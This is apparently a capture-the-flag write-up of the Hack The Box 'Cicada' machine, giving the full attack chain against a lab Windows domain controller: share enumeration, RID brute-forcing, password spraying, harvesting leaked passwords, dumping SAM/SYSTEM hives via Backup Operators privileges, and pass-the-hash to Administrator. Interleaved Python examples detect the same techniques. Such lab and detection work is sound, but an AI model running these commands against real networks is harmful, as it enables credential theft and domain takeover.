Cicada


IP: 10.129.64.6
Let’s start with the nmap scan.
nmap -sC -sV -o nmap 10.129.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 11:12 IST
Nmap scan report for 10.129.64.6
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-15 12:43:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-15T12:43:42
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.95 seconds
We have a lot of interesting ports open (DNS, Kerberos, LDAP, SMB, WinRM), from which we can safely assume it's a Windows domain controller.
Also, we can see cicada.htb being mentioned many times, so let's first add it to our hosts file.
sudo nano /etc/hosts
Since SMB often allows guest authentication, let's start by enumerating shares.
nxc smb 10.129.64.6 --shares
We get an error saying the user session was deleted, so let's specify a non-existent user with an empty password and see whether guest authentication is allowed.
nxc smb 10.129.64.6 -u "dignitas" -p "" --shares
We have two new shares, DEV and HR, and we also have READ access on the HR share.
smbclient -U 'dignitas' //10.129.64.6/HR
So, we have a Notice from HR file, let’s get that to our machine and see the contents of it.
mget *.txt
cat Notice\ from\ HR.txt
We've been provided with a default password here: Cicada$M6Corpb*@Lp#nZp!8
But we're unaware of the users.
As we have guest authentication, we can do RID brute-forcing to enumerate the user IDs (RIDs) from 0-4000.
nxc smb 10.129.64.6 -u "dignitas" -p "" --rid-brute
We got some users, so let’s add that to our list and then start with the password spray.
nxc smb 10.129.64.6 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
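From the defender's side, the spray above leaves a distinctive trace in the Security log: one source failing once against many different accounts inside a short window, followed by a success for one of them. The following is an added example (not part of this writeup) that applies that logic to a small set of constructed logon events shaped like the fields of Security events 4625 and 4624. The source IPs and the user1-user5 account names are made up, and detect_password_spray is my own function name.

```python
"""Password-spray detector for Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Fields mirror the parts of
# Security events 4625 (failed logon) / 4624 (successful logon) a SIEM keeps.
SAMPLE_EVENTS = [
    {"time": "2025-05-15T12:50:01", "event_id": 4625, "user": "user1", "src": "10.10.14.7"},
    {"time": "2025-05-15T12:50:02", "event_id": 4625, "user": "user2", "src": "10.10.14.7"},
    {"time": "2025-05-15T12:50:03", "event_id": 4625, "user": "user3", "src": "10.10.14.7"},
    {"time": "2025-05-15T12:50:04", "event_id": 4625, "user": "user4", "src": "10.10.14.7"},
    {"time": "2025-05-15T12:50:05", "event_id": 4625, "user": "user5", "src": "10.10.14.7"},
    {"time": "2025-05-15T12:50:06", "event_id": 4624, "user": "michael.wrightson", "src": "10.10.14.7"},
    # One user mistyping their own password twice is noise, not a spray.
    {"time": "2025-05-15T13:10:00", "event_id": 4625, "user": "emily.oscars", "src": "10.10.20.5"},
    {"time": "2025-05-15T13:10:20", "event_id": 4625, "user": "emily.oscars", "src": "10.10.20.5"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag sources that failed against >= min_accounts distinct accounts
    inside any sliding window of length `window`, and list which accounts
    then logged on successfully from the same source (likely compromised)."""
    fails, successes = defaultdict(list), defaultdict(list)
    for ev in events:
        ts, user = datetime.fromisoformat(ev["time"]), ev["user"].lower()
        if ev["event_id"] == 4625:
            fails[ev["src"]].append((ts, user))
        elif ev["event_id"] == 4624:
            successes[ev["src"]].append((ts, user))

    alerts = {}
    for src, entries in fails.items():
        entries.sort()
        start = 0
        for end in range(len(entries)):
            # Shrink the window from the left until it spans at most `window`.
            while entries[end][0] - entries[start][0] > window:
                start += 1
            accounts = {u for _, u in entries[start:end + 1]}
            if len(accounts) >= min_accounts:
                first_fail = entries[start][0]
                hits = sorted({u for ts, u in successes.get(src, []) if ts >= first_fail})
                alerts[src] = {"sprayed": sorted(accounts), "succeeded": hits}
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"spray from {src}: {len(info['sprayed'])} accounts, "
              f"successful logons: {info['succeeded'] or 'none'}")
```

The window and account thresholds need tuning per environment, and 4625 is written on the host that processed the logon, so in a domain with several DCs the events must be collected from all of them before this kind of correlation works.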
The password is valid for michael.wrightson. Let's enumerate and see if this user has access to the DEV share.
nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
Michael doesn’t have any additional share access beyond what the guest user has. Now with LDAP access, we can look for a more complete list of users.
nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
We have 8 local users, but the interesting thing is that the user david.orelious has a comment that spills his password: aRt$Lp#7t*VQ!3
Let's now check access to the DEV share again.
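A password stored in a user's description attribute is readable by every authenticated account, which is why it should be caught in a periodic audit rather than by an attacker. Below is an added example (not from this writeup) of the heuristic such an audit can use: it scans Username/Description records for a token that looks like a password, either one using all four character classes or a three-class token next to a password keyword. The records are constructed; the david.orelious value is the one this writeup found, the other descriptions are made up, and find_credential_descriptions is my own function name.

```python
"""Flag AD user descriptions that look like they contain a password (added example)."""
import re

# Constructed sample records in the shape of the Username/Description columns
# an LDAP user listing returns. Only the david.orelious value is from the box.
SAMPLE_USERS = [
    {"sam": "michael.wrightson", "description": ""},
    {"sam": "david.orelious", "description": "Temp access, password is aRt$Lp#7t*VQ!3"},
    {"sam": "helpdesk", "description": "Ticketing service account, see KB-1042"},
    {"sam": "svc_backup", "description": "Nightly backup job, owner IT-Ops@cicada.htb"},
    {"sam": "jdoe", "description": "pwd: Summer2025"},
]

KEYWORD = re.compile(r"\b(password|passwd|pwd|pass)\b", re.I)


def char_classes(token):
    """Count how many of lower/upper/digit/symbol classes a token uses."""
    return sum([
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ])


def find_credential_descriptions(users, min_len=8):
    """Return one finding per user whose description holds a password-like token.
    A token counts if it uses all four character classes, or three classes
    when a password keyword appears in the same description."""
    findings = []
    for u in users:
        desc = u["description"]
        has_keyword = bool(KEYWORD.search(desc))
        for raw in desc.split():
            token = raw.strip("\"'().,;:")  # drop surrounding punctuation
            if len(token) < min_len:
                continue
            classes = char_classes(token)
            if classes == 4 or (has_keyword and classes >= 3):
                findings.append({"user": u["sam"], "token": token,
                                 "reason": f"{classes} char classes, keyword={has_keyword}"})
                break  # one finding per user is enough
    return findings


if __name__ == "__main__":
    for hit in find_credential_descriptions(SAMPLE_USERS):
        print(f"{hit['user']}: {hit['reason']}")
```

The helpdesk and svc_backup records show the two false-positive traps the rule avoids: a short ticket reference and an e-mail address both mix character classes but fail the length or keyword condition.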
nxc smb 10.129.64.6 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
Let's look at the contents of the DEV share.
smbclient -U 'cicada/david.orelious%aRt$Lp#7t*VQ!3' //10.129.64.6/DEV
We have a file named Backup_script.ps1. Let's download it to our machine and see what we have in there.
mget *.ps1
cat Backup_script.ps1
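A credential embedded in a maintenance script on a readable share is a secret-scanning problem, and the PowerShell constructs involved are regular enough to match. The following is an added example (not from this writeup and not the box's script) that scans a constructed script for the two common shapes: ConvertTo-SecureString fed a plaintext literal, and a credential-looking variable assigned a string literal. Findings are redacted so the scanner's own output does not become a second leak. The sample script text and password placeholder are made up, and scan_powershell is my own function name.

```python
"""Scan PowerShell scripts for hard-coded credentials (added example)."""
import re

# Constructed sample script: the shape of a backup script that embeds a
# password, alongside lines that should NOT fire (prompted credential,
# ordinary variables). The password here is a placeholder, not a real one.
SAMPLE_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$destinationDirectory = "D:\\Backup"
$username = "svc_backup"
$password = ConvertTo-SecureString "P@ssw0rd-EXAMPLE" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
$interactive = Read-Host "Password" -AsSecureString
$smtpPass = 'Mail#2024!'
"""

# Each rule captures the secret literal in group 1 so it can be redacted.
RULES = [
    ("ConvertTo-SecureString from a plaintext literal",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?[\"']([^\"']+)[\"'].*-AsPlainText", re.I)),
    ("credential-looking variable assigned a string literal",
     re.compile(r"\$\w*(?:pass|pwd|secret|token|apikey)\w*\s*=\s*[\"']([^\"']+)[\"']", re.I)),
]


def redact(secret, keep=2):
    """Keep the first `keep` characters so a reviewer can match the finding
    to the file without the full secret landing in a ticket or log."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def scan_powershell(text):
    """Return findings as {line, rule, redacted} for each rule hit, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "rule": name, "redacted": redact(m.group(1))})
                break  # report the most specific rule only, once per line
    return findings


if __name__ == "__main__":
    for f in scan_powershell(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['rule']} -> {f['redacted']}")
```

The Read-Host line is included on purpose: prompting for a SecureString is the pattern the script should have used, and it produces no finding.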
So, we have the password for emily.oscars, i.e. Q!3@Lp#M6b*7t*Vt. Let's see if the creds are valid for WinRM.
nxc winrm 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Let's now connect using evil-winrm.
evil-winrm -i 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Let’s now get our first flag.
type C:\Users\emily.oscars.CICADA\Desktop\user.txt
Flag: 2b8a749011d596957ba7c3159c1ea4a5
Let's now move on to root, starting by checking the privileges of the emily.oscars user.
net user emily.oscars
Emily is a member of the Backup Operators group.
According to Microsoft docs, this group:
Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. Members of the following groups can modify Backup Operators group membership: default service Administrators, Domain Admins in the domain, and Enterprise Admins. Members of the Backup Operators group can’t modify the membership of any administrative groups. Although members of this group can’t change server settings or modify the configuration of the directory, they do have the permissions needed to replace files (including operating system files) on domain controllers. Because members of this group can replace files on domain controllers, they’re considered service administrators.
This shows up in the form of the SeBackupPrivilege and SeRestorePrivilege:
whoami /priv
Let’s now dump the registry hives to files and exfiltrate them.
reg save hklm\sam sam
reg save hklm\system system
reg save hklm\security security
download sam
download system
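The hive dump above is what a detection for Backup Operators abuse should key on: SeBackupPrivilege lets a non-admin read SAM, SYSTEM and SECURITY, and the reg save command line is visible in process-creation telemetry. Below is an added example (not from this writeup) that runs a matching rule over constructed process-creation events shaped like the fields of Security event 4688 / Sysmon event 1, and tags each hit with whether the account holds Backup Operators, using a constructed membership snapshot. The jdoe and SYSTEM events are made up, and detect_hive_dumps is my own function name.

```python
"""Detect registry hive dumps in process-creation telemetry (added example)."""
import re

# Constructed membership snapshot (not pulled from the box): which accounts
# hold Backup Operators, i.e. SeBackupPrivilege, so a hit can be tied to it.
BACKUP_OPERATORS = {r"cicada\emily.oscars"}

# Constructed process-creation events shaped like the fields of Security
# event 4688 / Sysmon event 1 that matter here.
SAMPLE_EVENTS = [
    {"user": r"CICADA\emily.oscars", "cmd": r"reg save hklm\sam sam"},
    {"user": r"CICADA\emily.oscars", "cmd": r"reg  save HKLM\SYSTEM system"},
    {"user": r"CICADA\emily.oscars", "cmd": r"reg save hklm\security security"},
    {"user": r"CICADA\jdoe", "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"user": r"NT AUTHORITY\SYSTEM",
     "cmd": r"C:\Windows\System32\reg.exe save HKEY_LOCAL_MACHINE\SOFTWARE\Policies policies.hiv"},
    {"user": r"CICADA\jdoe", "cmd": r'reg.exe export "HKLM\SAM" C:\temp\s.hiv'},
]

# reg save/export of the three hives secretsdump needs; tolerates reg.exe,
# full paths, extra spaces, the long HKEY_LOCAL_MACHINE form and quoting.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.I,
)


def detect_hive_dumps(events, backup_operators=BACKUP_OPERATORS):
    """Return one alert per event that saves/exports SAM, SYSTEM or SECURITY,
    noting whether the account holds Backup Operators (the privilege that
    makes the dump succeed for a non-admin)."""
    alerts = []
    for ev in events:
        m = HIVE_DUMP.search(ev["cmd"])
        if not m:
            continue
        alerts.append({
            "user": ev["user"],
            "hive": m.group(1).upper(),
            "backup_operator": ev["user"].lower() in backup_operators,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_hive_dumps(SAMPLE_EVENTS):
        print(f"{a['user']} dumped {a['hive']} (Backup Operator: {a['backup_operator']})")
```

The SOFTWARE\Policies save by SYSTEM is left unmatched deliberately: legitimate tooling touches other hives, so the rule stays narrow to the three that yield credentials. Alongside the rule, keeping Backup Operators empty on domain controllers removes the privilege the whole step depends on.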
Let’s now dump the hashes.
impacket-secretsdump -sam sam -system system LOCAL
We got the Administrator hash, let’s use that to log in.
evil-winrm -i 10.129.64.6 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Let’s get our root flag now.
type C:\Users\Administrator\Desktop\root.txt
Flag: 8f272a073990777e7c9a3798de37b2d3
Written by

REHAN SAYYED
Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.